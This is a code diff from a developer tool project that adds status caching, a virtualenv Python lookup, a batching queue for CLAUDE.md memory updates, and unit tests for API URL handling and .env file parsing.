const result = JSON.parse(output);
|
||||
resolve({
|
||||
console.log(`[PERF][CodexLens] checkSemanticStatus Python spawn: ${Date.now() - spawnStart}ms | TOTAL: ${Date.now() - funcStart}ms | available: ${result.available}`);
|
||||
const status: SemanticStatus = {
|
||||
available: result.available || false,
|
||||
backend: result.backend,
|
||||
accelerator: result.accelerator || 'CPU',
|
||||
providers: result.providers || [],
|
||||
litellmAvailable: result.litellm_available || false,
|
||||
error: result.error
|
||||
});
|
||||
};
|
||||
// Cache the result
|
||||
semanticStatusCache = { status, timestamp: Date.now() };
|
||||
resolve(status);
|
||||
} catch {
|
||||
resolve({ available: false, error: output || stderr || 'Unknown error' });
|
||||
console.log(`[PERF][CodexLens] checkSemanticStatus PARSE ERROR: ${Date.now() - funcStart}ms`);
|
||||
const errorStatus: SemanticStatus = { available: false, error: output || stderr || 'Unknown error' };
|
||||
semanticStatusCache = { status: errorStatus, timestamp: Date.now() };
|
||||
resolve(errorStatus);
|
||||
}
|
||||
});
|
||||
|
||||
child.on('error', (err) => {
|
||||
resolve({ available: false, error: `Check failed: ${err.message}` });
|
||||
console.log(`[PERF][CodexLens] checkSemanticStatus ERROR: ${Date.now() - funcStart}ms`);
|
||||
const errorStatus: SemanticStatus = { available: false, error: `Check failed: ${err.message}` };
|
||||
semanticStatusCache = { status: errorStatus, timestamp: Date.now() };
|
||||
resolve(errorStatus);
|
||||
});
|
||||
});
|
||||
}
|
||||
@@ -583,6 +635,7 @@ async function bootstrapWithUv(gpuMode: GpuMode = 'cpu'): Promise<BootstrapResul
|
||||
|
||||
// Clear cache after successful installation
|
||||
clearVenvStatusCache();
|
||||
clearSemanticStatusCache();
|
||||
console.log(`[CodexLens] Bootstrap with UV complete (${gpuMode} mode)`);
|
||||
return { success: true, message: `Installed with UV (${gpuMode} mode)` };
|
||||
}
|
||||
@@ -878,6 +931,7 @@ async function bootstrapVenv(): Promise<BootstrapResult> {
|
||||
|
||||
// Clear cache after successful installation
|
||||
clearVenvStatusCache();
|
||||
clearSemanticStatusCache();
|
||||
return { success: true };
|
||||
} catch (err) {
|
||||
return { success: false, error: `Failed to install codexlens: ${(err as Error).message}` };
|
||||
@@ -1631,6 +1685,7 @@ async function uninstallCodexLens(): Promise<BootstrapResult> {
|
||||
bootstrapChecked = false;
|
||||
bootstrapReady = false;
|
||||
clearVenvStatusCache();
|
||||
clearSemanticStatusCache();
|
||||
|
||||
console.log('[CodexLens] CodexLens uninstalled successfully');
|
||||
return { success: true, message: 'CodexLens uninstalled successfully' };
|
||||
|
||||
@@ -30,6 +30,7 @@ import type { ProgressInfo } from './codex-lens.js';
|
||||
import { uiGeneratePreviewTool } from './ui-generate-preview.js';
|
||||
import { uiInstantiatePrototypesTool } from './ui-instantiate-prototypes.js';
|
||||
import { updateModuleClaudeTool } from './update-module-claude.js';
|
||||
import { memoryQueueTool } from './memory-update-queue.js';
|
||||
|
||||
interface LegacyTool {
|
||||
name: string;
|
||||
@@ -366,6 +367,7 @@ registerTool(toLegacyTool(skillContextLoaderMod));
|
||||
registerTool(uiGeneratePreviewTool);
|
||||
registerTool(uiInstantiatePrototypesTool);
|
||||
registerTool(updateModuleClaudeTool);
|
||||
registerTool(memoryQueueTool);
|
||||
|
||||
// Export for external tool registration
|
||||
export { registerTool };
|
||||
|
||||
@@ -10,14 +10,36 @@
|
||||
*/
|
||||
|
||||
import { spawn } from 'child_process';
|
||||
import { promisify } from 'util';
|
||||
import { existsSync } from 'fs';
|
||||
import { join } from 'path';
|
||||
import { homedir } from 'os';
|
||||
|
||||
export interface LiteLLMConfig {
|
||||
pythonPath?: string; // Default 'python'
|
||||
pythonPath?: string; // Default: CodexLens venv Python
|
||||
configPath?: string; // Configuration file path
|
||||
timeout?: number; // Default 60000ms
|
||||
}
|
||||
|
||||
// Platform-specific constants for CodexLens venv
|
||||
const IS_WINDOWS = process.platform === 'win32';
|
||||
const CODEXLENS_VENV = join(homedir(), '.codexlens', 'venv');
|
||||
const VENV_BIN_DIR = IS_WINDOWS ? 'Scripts' : 'bin';
|
||||
const PYTHON_EXECUTABLE = IS_WINDOWS ? 'python.exe' : 'python';
|
||||
|
||||
/**
|
||||
* Get the Python path from CodexLens venv
|
||||
* Falls back to system 'python' if venv doesn't exist
|
||||
* @returns Path to Python executable
|
||||
*/
|
||||
export function getCodexLensVenvPython(): string {
|
||||
const venvPython = join(CODEXLENS_VENV, VENV_BIN_DIR, PYTHON_EXECUTABLE);
|
||||
if (existsSync(venvPython)) {
|
||||
return venvPython;
|
||||
}
|
||||
// Fallback to system Python if venv not available
|
||||
return 'python';
|
||||
}
|
||||
|
||||
export interface ChatMessage {
|
||||
role: 'system' | 'user' | 'assistant';
|
||||
content: string;
|
||||
@@ -51,7 +73,7 @@ export class LiteLLMClient {
|
||||
private timeout: number;
|
||||
|
||||
constructor(config: LiteLLMConfig = {}) {
|
||||
this.pythonPath = config.pythonPath || 'python';
|
||||
this.pythonPath = config.pythonPath || getCodexLensVenvPython();
|
||||
this.configPath = config.configPath;
|
||||
this.timeout = config.timeout || 60000;
|
||||
}
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
* Integrates with context-cache for file packing and LiteLLM client for API calls
|
||||
*/
|
||||
|
||||
import { getLiteLLMClient } from './litellm-client.js';
|
||||
import { getLiteLLMClient, getCodexLensVenvPython } from './litellm-client.js';
|
||||
import { handler as contextCacheHandler } from './context-cache.js';
|
||||
import {
|
||||
findEndpointById,
|
||||
@@ -179,7 +179,7 @@ export async function executeLiteLLMEndpoint(
|
||||
}
|
||||
|
||||
const client = getLiteLLMClient({
|
||||
pythonPath: 'python',
|
||||
pythonPath: getCodexLensVenvPython(),
|
||||
timeout: 120000, // 2 minutes
|
||||
});
|
||||
|
||||
|
||||
499
ccw/src/tools/memory-update-queue.js
Normal file
@@ -0,0 +1,499 @@
|
||||
/**
|
||||
* Memory Update Queue Tool
|
||||
* Queue mechanism for batching CLAUDE.md updates
|
||||
*
|
||||
* Configuration:
|
||||
* - Threshold: 5 paths trigger update
|
||||
* - Timeout: 5 minutes auto-trigger
|
||||
* - Storage: ~/.claude/.memory-queue.json
|
||||
* - Deduplication: Same path only kept once
|
||||
*/
|
||||
|
||||
import { existsSync, readFileSync, writeFileSync, mkdirSync } from 'fs';
|
||||
import { join, dirname, resolve } from 'path';
|
||||
import { homedir } from 'os';
|
||||
|
||||
// Default configuration
|
||||
const DEFAULT_THRESHOLD = 5;
|
||||
const DEFAULT_TIMEOUT_SECONDS = 300; // 5 minutes
|
||||
const QUEUE_FILE_PATH = join(homedir(), '.claude', '.memory-queue.json');
|
||||
|
||||
/**
|
||||
* Get queue configuration (from file or defaults)
|
||||
* @returns {{ threshold: number, timeoutMs: number }}
|
||||
*/
|
||||
function getQueueConfig() {
|
||||
try {
|
||||
if (existsSync(QUEUE_FILE_PATH)) {
|
||||
const content = readFileSync(QUEUE_FILE_PATH, 'utf8');
|
||||
const data = JSON.parse(content);
|
||||
return {
|
||||
threshold: data.config?.threshold || DEFAULT_THRESHOLD,
|
||||
timeoutMs: (data.config?.timeout || DEFAULT_TIMEOUT_SECONDS) * 1000
|
||||
};
|
||||
}
|
||||
} catch (e) {
|
||||
// Use defaults
|
||||
}
|
||||
return {
|
||||
threshold: DEFAULT_THRESHOLD,
|
||||
timeoutMs: DEFAULT_TIMEOUT_SECONDS * 1000
|
||||
};
|
||||
}
|
||||
|
||||
// In-memory timeout reference (for cross-call persistence, we track via file timestamp)
|
||||
let scheduledTimeoutId = null;
|
||||
|
||||
/**
|
||||
* Ensure parent directory exists
|
||||
*/
|
||||
function ensureDir(filePath) {
|
||||
const dir = dirname(filePath);
|
||||
if (!existsSync(dir)) {
|
||||
mkdirSync(dir, { recursive: true });
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Load queue from file
|
||||
* @returns {{ items: Array<{path: string, tool: string, strategy: string, addedAt: string}>, createdAt: string | null, config?: { threshold: number, timeout: number } }}
|
||||
*/
|
||||
function loadQueue() {
|
||||
try {
|
||||
if (existsSync(QUEUE_FILE_PATH)) {
|
||||
const content = readFileSync(QUEUE_FILE_PATH, 'utf8');
|
||||
const data = JSON.parse(content);
|
||||
return {
|
||||
items: Array.isArray(data.items) ? data.items : [],
|
||||
createdAt: data.createdAt || null,
|
||||
config: data.config || null
|
||||
};
|
||||
}
|
||||
} catch (e) {
|
||||
console.error('[MemoryQueue] Failed to load queue:', e.message);
|
||||
}
|
||||
return { items: [], createdAt: null, config: null };
|
||||
}
|
||||
|
||||
/**
|
||||
* Save queue to file
|
||||
* @param {{ items: Array<{path: string, tool: string, strategy: string, addedAt: string}>, createdAt: string | null }} data
|
||||
*/
|
||||
function saveQueue(data) {
|
||||
try {
|
||||
ensureDir(QUEUE_FILE_PATH);
|
||||
writeFileSync(QUEUE_FILE_PATH, JSON.stringify(data, null, 2), 'utf8');
|
||||
} catch (e) {
|
||||
console.error('[MemoryQueue] Failed to save queue:', e.message);
|
||||
throw e;
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Normalize path for comparison (handle Windows/Unix differences)
|
||||
* @param {string} p
|
||||
* @returns {string}
|
||||
*/
|
||||
function normalizePath(p) {
|
||||
return resolve(p).replace(/\\/g, '/').toLowerCase();
|
||||
}
|
||||
|
||||
/**
|
||||
* Add path to queue with deduplication
|
||||
* @param {string} path - Module path to update
|
||||
* @param {{ tool?: string, strategy?: string }} options
|
||||
* @returns {{ queued: boolean, queueSize: number, willFlush: boolean, message: string }}
|
||||
*/
|
||||
function addToQueue(path, options = {}) {
|
||||
const { tool = 'gemini', strategy = 'single-layer' } = options;
|
||||
const queue = loadQueue();
|
||||
const config = getQueueConfig();
|
||||
const normalizedPath = normalizePath(path);
|
||||
const now = new Date().toISOString();
|
||||
|
||||
// Check for duplicates
|
||||
const existingIndex = queue.items.findIndex(
|
||||
item => normalizePath(item.path) === normalizedPath
|
||||
);
|
||||
|
||||
if (existingIndex !== -1) {
|
||||
// Update existing entry timestamp but keep it deduplicated
|
||||
queue.items[existingIndex].addedAt = now;
|
||||
queue.items[existingIndex].tool = tool;
|
||||
queue.items[existingIndex].strategy = strategy;
|
||||
saveQueue(queue);
|
||||
|
||||
return {
|
||||
queued: false,
|
||||
queueSize: queue.items.length,
|
||||
willFlush: queue.items.length >= config.threshold,
|
||||
message: `Path already in queue (updated): ${path}`
|
||||
};
|
||||
}
|
||||
|
||||
// Add new item
|
||||
queue.items.push({
|
||||
path,
|
||||
tool,
|
||||
strategy,
|
||||
addedAt: now
|
||||
});
|
||||
|
||||
// Set createdAt if this is the first item
|
||||
if (!queue.createdAt) {
|
||||
queue.createdAt = now;
|
||||
}
|
||||
|
||||
saveQueue(queue);
|
||||
|
||||
const willFlush = queue.items.length >= config.threshold;
|
||||
|
||||
// Schedule timeout if not already scheduled
|
||||
scheduleTimeout();
|
||||
|
||||
return {
|
||||
queued: true,
|
||||
queueSize: queue.items.length,
|
||||
willFlush,
|
||||
message: willFlush
|
||||
? `Queue threshold reached (${queue.items.length}/${config.threshold}), will flush`
|
||||
: `Added to queue (${queue.items.length}/${config.threshold})`
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* Get current queue status
|
||||
* @returns {{ queueSize: number, threshold: number, items: Array, timeoutMs: number | null, createdAt: string | null }}
|
||||
*/
|
||||
function getQueueStatus() {
|
||||
const queue = loadQueue();
|
||||
const config = getQueueConfig();
|
||||
let timeUntilTimeout = null;
|
||||
|
||||
if (queue.createdAt && queue.items.length > 0) {
|
||||
const createdTime = new Date(queue.createdAt).getTime();
|
||||
const elapsed = Date.now() - createdTime;
|
||||
timeUntilTimeout = Math.max(0, config.timeoutMs - elapsed);
|
||||
}
|
||||
|
||||
return {
|
||||
queueSize: queue.items.length,
|
||||
threshold: config.threshold,
|
||||
items: queue.items,
|
||||
timeoutMs: config.timeoutMs,
|
||||
timeoutSeconds: config.timeoutMs / 1000,
|
||||
timeUntilTimeout,
|
||||
createdAt: queue.createdAt
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* Configure queue settings
|
||||
* @param {{ threshold?: number, timeout?: number }} settings
|
||||
* @returns {{ success: boolean, config: { threshold: number, timeout: number } }}
|
||||
*/
|
||||
function configureQueue(settings) {
|
||||
const queue = loadQueue();
|
||||
const currentConfig = getQueueConfig();
|
||||
|
||||
const newConfig = {
|
||||
threshold: settings.threshold || currentConfig.threshold,
|
||||
timeout: settings.timeout || (currentConfig.timeoutMs / 1000)
|
||||
};
|
||||
|
||||
// Validate
|
||||
if (newConfig.threshold < 1 || newConfig.threshold > 20) {
|
||||
throw new Error('Threshold must be between 1 and 20');
|
||||
}
|
||||
if (newConfig.timeout < 60 || newConfig.timeout > 1800) {
|
||||
throw new Error('Timeout must be between 60 and 1800 seconds');
|
||||
}
|
||||
|
||||
queue.config = newConfig;
|
||||
saveQueue(queue);
|
||||
|
||||
return {
|
||||
success: true,
|
||||
config: newConfig,
|
||||
message: `Queue configured: threshold=${newConfig.threshold}, timeout=${newConfig.timeout}s`
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* Flush queue - execute batch update
|
||||
* @returns {Promise<{ success: boolean, processed: number, results: Array, errors: Array }>}
|
||||
*/
|
||||
async function flushQueue() {
|
||||
const queue = loadQueue();
|
||||
|
||||
if (queue.items.length === 0) {
|
||||
return {
|
||||
success: true,
|
||||
processed: 0,
|
||||
results: [],
|
||||
errors: [],
|
||||
message: 'Queue is empty'
|
||||
};
|
||||
}
|
||||
|
||||
// Clear timeout
|
||||
clearScheduledTimeout();
|
||||
|
||||
// Import update_module_claude dynamically to avoid circular deps
|
||||
const { updateModuleClaudeTool } = await import('./update-module-claude.js');
|
||||
|
||||
const results = [];
|
||||
const errors = [];
|
||||
|
||||
// Group by tool and strategy for efficiency
|
||||
const groups = new Map();
|
||||
for (const item of queue.items) {
|
||||
const key = `${item.tool}:${item.strategy}`;
|
||||
if (!groups.has(key)) {
|
||||
groups.set(key, []);
|
||||
}
|
||||
groups.get(key).push(item);
|
||||
}
|
||||
|
||||
// Process each group
|
||||
for (const [key, items] of groups) {
|
||||
const [tool, strategy] = key.split(':');
|
||||
console.log(`[MemoryQueue] Processing ${items.length} items with ${tool}/${strategy}`);
|
||||
|
||||
for (const item of items) {
|
||||
try {
|
||||
const result = await updateModuleClaudeTool.execute({
|
||||
path: item.path,
|
||||
tool: item.tool,
|
||||
strategy: item.strategy
|
||||
});
|
||||
|
||||
results.push({
|
||||
path: item.path,
|
||||
success: result.success !== false,
|
||||
result
|
||||
});
|
||||
} catch (e) {
|
||||
console.error(`[MemoryQueue] Failed to update ${item.path}:`, e.message);
|
||||
errors.push({
|
||||
path: item.path,
|
||||
error: e.message
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Clear queue after processing
|
||||
saveQueue({ items: [], createdAt: null });
|
||||
|
||||
return {
|
||||
success: errors.length === 0,
|
||||
processed: queue.items.length,
|
||||
results,
|
||||
errors,
|
||||
message: `Processed ${results.length} items, ${errors.length} errors`
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* Schedule timeout for auto-flush
|
||||
*/
|
||||
function scheduleTimeout() {
|
||||
// We use file-based timeout tracking for persistence across process restarts
|
||||
// The actual timeout check happens on next add/status call
|
||||
const queue = loadQueue();
|
||||
const config = getQueueConfig();
|
||||
|
||||
if (!queue.createdAt || queue.items.length === 0) {
|
||||
return;
|
||||
}
|
||||
|
||||
const createdTime = new Date(queue.createdAt).getTime();
|
||||
const elapsed = Date.now() - createdTime;
|
||||
|
||||
if (elapsed >= config.timeoutMs) {
|
||||
// Timeout already exceeded, should flush
|
||||
console.log('[MemoryQueue] Timeout exceeded, auto-flushing');
|
||||
// Don't await here to avoid blocking
|
||||
flushQueue().catch(e => {
|
||||
console.error('[MemoryQueue] Auto-flush failed:', e.message);
|
||||
});
|
||||
} else if (!scheduledTimeoutId) {
|
||||
// Schedule in-memory timeout for current process
|
||||
const remaining = config.timeoutMs - elapsed;
|
||||
scheduledTimeoutId = setTimeout(() => {
|
||||
scheduledTimeoutId = null;
|
||||
const currentQueue = loadQueue();
|
||||
if (currentQueue.items.length > 0) {
|
||||
console.log('[MemoryQueue] Timeout reached, auto-flushing');
|
||||
flushQueue().catch(e => {
|
||||
console.error('[MemoryQueue] Auto-flush failed:', e.message);
|
||||
});
|
||||
}
|
||||
}, remaining);
|
||||
|
||||
// Prevent timeout from keeping process alive
|
||||
if (scheduledTimeoutId.unref) {
|
||||
scheduledTimeoutId.unref();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Clear scheduled timeout
|
||||
*/
|
||||
function clearScheduledTimeout() {
|
||||
if (scheduledTimeoutId) {
|
||||
clearTimeout(scheduledTimeoutId);
|
||||
scheduledTimeoutId = null;
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if timeout has expired and auto-flush if needed
|
||||
* @returns {Promise<{ expired: boolean, flushed: boolean, result?: object }>}
|
||||
*/
|
||||
async function checkTimeout() {
|
||||
const queue = loadQueue();
|
||||
const config = getQueueConfig();
|
||||
|
||||
if (!queue.createdAt || queue.items.length === 0) {
|
||||
return { expired: false, flushed: false };
|
||||
}
|
||||
|
||||
const createdTime = new Date(queue.createdAt).getTime();
|
||||
const elapsed = Date.now() - createdTime;
|
||||
|
||||
if (elapsed >= config.timeoutMs) {
|
||||
console.log('[MemoryQueue] Timeout expired, triggering flush');
|
||||
const result = await flushQueue();
|
||||
return { expired: true, flushed: true, result };
|
||||
}
|
||||
|
||||
return { expired: false, flushed: false };
|
||||
}
|
||||
|
||||
/**
|
||||
* Main execute function for tool interface
|
||||
* @param {Record<string, unknown>} params
|
||||
* @returns {Promise<unknown>}
|
||||
*/
|
||||
async function execute(params) {
|
||||
const { action, path, tool = 'gemini', strategy = 'single-layer', threshold, timeout } = params;
|
||||
|
||||
switch (action) {
|
||||
case 'add':
|
||||
if (!path) {
|
||||
throw new Error('Parameter "path" is required for add action');
|
||||
}
|
||||
// Check timeout first
|
||||
const timeoutCheck = await checkTimeout();
|
||||
if (timeoutCheck.flushed) {
|
||||
// Queue was flushed due to timeout, add to fresh queue
|
||||
const result = addToQueue(path, { tool, strategy });
|
||||
return {
|
||||
...result,
|
||||
timeoutFlushed: true,
|
||||
flushResult: timeoutCheck.result
|
||||
};
|
||||
}
|
||||
|
||||
const addResult = addToQueue(path, { tool, strategy });
|
||||
|
||||
// Auto-flush if threshold reached
|
||||
if (addResult.willFlush) {
|
||||
const flushResult = await flushQueue();
|
||||
return {
|
||||
...addResult,
|
||||
flushed: true,
|
||||
flushResult
|
||||
};
|
||||
}
|
||||
|
||||
return addResult;
|
||||
|
||||
case 'status':
|
||||
// Check timeout first
|
||||
await checkTimeout();
|
||||
return getQueueStatus();
|
||||
|
||||
case 'flush':
|
||||
return await flushQueue();
|
||||
|
||||
case 'configure':
|
||||
return configureQueue({ threshold, timeout });
|
||||
|
||||
default:
|
||||
throw new Error(`Unknown action: ${action}. Valid actions: add, status, flush, configure`);
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Tool Definition
|
||||
*/
|
||||
export const memoryQueueTool = {
|
||||
name: 'memory_queue',
|
||||
description: `Memory update queue management. Batches CLAUDE.md updates for efficiency.
|
||||
|
||||
Actions:
|
||||
- add: Add path to queue (auto-flushes at configured threshold/timeout)
|
||||
- status: Get queue status and configuration
|
||||
- flush: Immediately execute all queued updates
|
||||
- configure: Set threshold and timeout settings`,
|
||||
parameters: {
|
||||
type: 'object',
|
||||
properties: {
|
||||
action: {
|
||||
type: 'string',
|
||||
enum: ['add', 'status', 'flush', 'configure'],
|
||||
description: 'Queue action to perform'
|
||||
},
|
||||
path: {
|
||||
type: 'string',
|
||||
description: 'Module directory path (required for add action)'
|
||||
},
|
||||
threshold: {
|
||||
type: 'number',
|
||||
description: 'Number of paths to trigger flush (1-20, for configure action)',
|
||||
minimum: 1,
|
||||
maximum: 20
|
||||
},
|
||||
timeout: {
|
||||
type: 'number',
|
||||
description: 'Timeout in seconds to trigger flush (60-1800, for configure action)',
|
||||
minimum: 60,
|
||||
maximum: 1800
|
||||
},
|
||||
tool: {
|
||||
type: 'string',
|
||||
enum: ['gemini', 'qwen', 'codex'],
|
||||
description: 'CLI tool to use (default: gemini)',
|
||||
default: 'gemini'
|
||||
},
|
||||
strategy: {
|
||||
type: 'string',
|
||||
enum: ['single-layer', 'multi-layer'],
|
||||
description: 'Update strategy (default: single-layer)',
|
||||
default: 'single-layer'
|
||||
}
|
||||
},
|
||||
required: ['action']
|
||||
},
|
||||
execute
|
||||
};
|
||||
|
||||
// Export individual functions for direct use
|
||||
export {
|
||||
loadQueue,
|
||||
saveQueue,
|
||||
addToQueue,
|
||||
getQueueStatus,
|
||||
flushQueue,
|
||||
configureQueue,
|
||||
scheduleTimeout,
|
||||
clearScheduledTimeout,
|
||||
checkTimeout,
|
||||
DEFAULT_THRESHOLD,
|
||||
DEFAULT_TIMEOUT_SECONDS,
|
||||
QUEUE_FILE_PATH
|
||||
};
|
||||
165
ccw/tests/api-key-tester.test.ts
Normal file
@@ -0,0 +1,165 @@
|
||||
/**
|
||||
* Unit tests for API Key Tester service (ccw/src/core/services/api-key-tester.ts)
|
||||
*
|
||||
* Tests URL construction logic, version suffix detection, and trailing slash handling.
|
||||
* Uses Node's built-in test runner (node:test).
|
||||
*/
|
||||
|
||||
import { describe, it } from 'node:test';
|
||||
import assert from 'node:assert/strict';
|
||||
|
||||
// Import functions that don't require fetch
|
||||
import { validateApiBaseUrl, getDefaultApiBase } from '../src/core/services/api-key-tester.js';
|
||||
|
||||
describe('API Key Tester', () => {
|
||||
describe('validateApiBaseUrl', () => {
|
||||
it('should accept valid HTTPS URLs', () => {
|
||||
const result = validateApiBaseUrl('https://api.openai.com/v1');
|
||||
assert.equal(result.valid, true);
|
||||
});
|
||||
|
||||
it('should accept valid HTTP URLs (for local development)', () => {
|
||||
const result = validateApiBaseUrl('http://localhost:8080');
|
||||
assert.equal(result.valid, true);
|
||||
});
|
||||
|
||||
it('should reject non-HTTP protocols', () => {
|
||||
const result = validateApiBaseUrl('ftp://example.com');
|
||||
assert.equal(result.valid, false);
|
||||
assert.equal(result.error, 'URL must use HTTP or HTTPS protocol');
|
||||
});
|
||||
|
||||
it('should reject invalid URL format', () => {
|
||||
const result = validateApiBaseUrl('not-a-url');
|
||||
assert.equal(result.valid, false);
|
||||
assert.equal(result.error, 'Invalid URL format');
|
||||
});
|
||||
});
|
||||
|
||||
describe('getDefaultApiBase', () => {
|
||||
it('should return OpenAI default for openai provider', () => {
|
||||
assert.equal(getDefaultApiBase('openai'), 'https://api.openai.com/v1');
|
||||
});
|
||||
|
||||
it('should return Anthropic default for anthropic provider', () => {
|
||||
assert.equal(getDefaultApiBase('anthropic'), 'https://api.anthropic.com/v1');
|
||||
});
|
||||
|
||||
it('should return OpenAI default for custom provider', () => {
|
||||
assert.equal(getDefaultApiBase('custom'), 'https://api.openai.com/v1');
|
||||
});
|
||||
});
|
||||
|
||||
describe('URL Normalization Logic (Issue #70 fix verification)', () => {
|
||||
// Test the regex pattern used in testApiKeyConnection
|
||||
const normalizeUrl = (url: string) => url.replace(/\/+$/, '');
|
||||
const hasVersionSuffix = (url: string) => /\/v\d+$/.test(url);
|
||||
|
||||
describe('Trailing slash removal', () => {
|
||||
it('should remove single trailing slash', () => {
|
||||
assert.equal(normalizeUrl('https://api.openai.com/v1/'), 'https://api.openai.com/v1');
|
||||
});
|
||||
|
||||
it('should remove multiple trailing slashes', () => {
|
||||
assert.equal(normalizeUrl('https://api.openai.com/v1///'), 'https://api.openai.com/v1');
|
||||
});
|
||||
|
||||
it('should not modify URL without trailing slash', () => {
|
||||
assert.equal(normalizeUrl('https://api.openai.com/v1'), 'https://api.openai.com/v1');
|
||||
});
|
||||
});
|
||||
|
||||
describe('Version suffix detection', () => {
|
||||
it('should detect /v1 suffix', () => {
|
||||
assert.equal(hasVersionSuffix('https://api.openai.com/v1'), true);
|
||||
});
|
||||
|
||||
it('should detect /v2 suffix', () => {
|
||||
assert.equal(hasVersionSuffix('https://api.custom.com/v2'), true);
|
||||
});
|
||||
|
||||
it('should detect /v4 suffix (z.ai style)', () => {
|
||||
assert.equal(hasVersionSuffix('https://api.z.ai/api/coding/paas/v4'), true);
|
||||
});
|
||||
|
||||
it('should NOT detect version when URL has no version suffix', () => {
|
||||
assert.equal(hasVersionSuffix('http://localhost:8080'), false);
|
||||
});
|
||||
|
||||
it('should NOT detect version when followed by slash (before normalization)', () => {
|
||||
// After normalization, the slash should be removed
|
||||
assert.equal(hasVersionSuffix('https://api.openai.com/v1/'), false);
|
||||
assert.equal(hasVersionSuffix(normalizeUrl('https://api.openai.com/v1/')), true);
|
||||
});
|
||||
});
|
||||
|
||||
describe('URL construction verification', () => {
|
||||
const constructModelsUrl = (apiBase: string) => {
|
||||
const normalized = normalizeUrl(apiBase);
|
||||
return hasVersionSuffix(normalized) ? `${normalized}/models` : `${normalized}/v1/models`;
|
||||
};
|
||||
|
||||
it('should construct correct URL for https://api.openai.com/v1', () => {
|
||||
assert.equal(constructModelsUrl('https://api.openai.com/v1'), 'https://api.openai.com/v1/models');
|
||||
});
|
||||
|
||||
it('should construct correct URL for https://api.openai.com/v1/ (with trailing slash)', () => {
|
||||
assert.equal(constructModelsUrl('https://api.openai.com/v1/'), 'https://api.openai.com/v1/models');
|
||||
});
|
||||
|
||||
it('should construct correct URL for https://api.custom.com/v2', () => {
|
||||
assert.equal(constructModelsUrl('https://api.custom.com/v2'), 'https://api.custom.com/v2/models');
|
||||
});
|
||||
|
||||
it('should construct correct URL for https://api.custom.com/v2/ (with trailing slash)', () => {
|
||||
assert.equal(constructModelsUrl('https://api.custom.com/v2/'), 'https://api.custom.com/v2/models');
|
||||
});
|
||||
|
||||
it('should construct correct URL for https://api.z.ai/api/coding/paas/v4', () => {
|
||||
assert.equal(constructModelsUrl('https://api.z.ai/api/coding/paas/v4'), 'https://api.z.ai/api/coding/paas/v4/models');
|
||||
});
|
||||
|
||||
it('should add /v1 when no version suffix: http://localhost:8080', () => {
|
||||
assert.equal(constructModelsUrl('http://localhost:8080'), 'http://localhost:8080/v1/models');
|
||||
});
|
||||
|
||||
it('should add /v1 when no version suffix: https://api.custom.com', () => {
|
||||
assert.equal(constructModelsUrl('https://api.custom.com'), 'https://api.custom.com/v1/models');
|
||||
});
|
||||
|
||||
it('should NOT produce double slashes in any case', () => {
|
||||
const testCases = [
|
||||
'https://api.openai.com/v1/',
|
||||
'https://api.openai.com/v1//',
|
||||
'https://api.anthropic.com/v1/',
|
||||
'http://localhost:8080/',
|
||||
];
|
||||
|
||||
for (const url of testCases) {
|
||||
const result = constructModelsUrl(url);
|
||||
assert.ok(!result.includes('//models'), `Double slash found in: ${result} (from: ${url})`);
|
||||
}
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
describe('Anthropic URL construction', () => {
|
||||
const constructAnthropicUrl = (apiBase: string) => {
|
||||
const normalized = apiBase.replace(/\/+$/, '');
|
||||
return `${normalized}/models`;
|
||||
};
|
||||
|
||||
it('should construct correct Anthropic URL without trailing slash', () => {
|
||||
assert.equal(constructAnthropicUrl('https://api.anthropic.com/v1'), 'https://api.anthropic.com/v1/models');
|
||||
});
|
||||
|
||||
it('should construct correct Anthropic URL WITH trailing slash', () => {
|
||||
assert.equal(constructAnthropicUrl('https://api.anthropic.com/v1/'), 'https://api.anthropic.com/v1/models');
|
||||
});
|
||||
|
||||
it('should NOT produce double slashes', () => {
|
||||
const result = constructAnthropicUrl('https://api.anthropic.com/v1//');
|
||||
assert.ok(!result.includes('//models'), `Double slash found in: ${result}`);
|
||||
});
|
||||
});
|
||||
});
|
||||
258
ccw/tests/cli-env-file.test.ts
Normal file
@@ -0,0 +1,258 @@
|
||||
/**
|
||||
* Unit tests for CLI env file loading mechanism
|
||||
*
|
||||
* Tests parseEnvFile and loadEnvFile functions without calling the actual CLI
|
||||
*/
|
||||
|
||||
import { describe, it, before, after } from 'node:test';
|
||||
import assert from 'node:assert/strict';
|
||||
import { existsSync, mkdtempSync, writeFileSync, rmSync } from 'node:fs';
|
||||
import { tmpdir, homedir } from 'node:os';
|
||||
import { join } from 'node:path';
|
||||
|
||||
// Set test CCW home before importing module
|
||||
const TEST_CCW_HOME = mkdtempSync(join(tmpdir(), 'ccw-env-file-test-'));
|
||||
process.env.CCW_DATA_DIR = TEST_CCW_HOME;
|
||||
|
||||
// Import from dist (built version)
|
||||
const cliExecutorPath = new URL('../dist/tools/cli-executor-core.js', import.meta.url).href;
|
||||
|
||||
describe('Env File Loading Mechanism', async () => {
|
||||
let parseEnvFile: (content: string) => Record<string, string>;
|
||||
let loadEnvFile: (envFilePath: string) => Record<string, string>;
|
||||
let testTempDir: string;
|
||||
|
||||
before(async () => {
|
||||
const mod = await import(cliExecutorPath);
|
||||
parseEnvFile = mod.parseEnvFile;
|
||||
loadEnvFile = mod.loadEnvFile;
|
||||
testTempDir = mkdtempSync(join(tmpdir(), 'env-test-'));
|
||||
});
|
||||
|
||||
after(() => {
|
||||
// Cleanup test directories
|
||||
if (existsSync(testTempDir)) {
|
||||
rmSync(testTempDir, { recursive: true, force: true });
|
||||
}
|
||||
if (existsSync(TEST_CCW_HOME)) {
|
||||
rmSync(TEST_CCW_HOME, { recursive: true, force: true });
|
||||
}
|
||||
});
|
||||
|
||||
describe('parseEnvFile', () => {
|
||||
it('should parse simple KEY=value pairs', () => {
|
||||
const content = `API_KEY=abc123
|
||||
SECRET=mysecret`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['API_KEY'], 'abc123');
|
||||
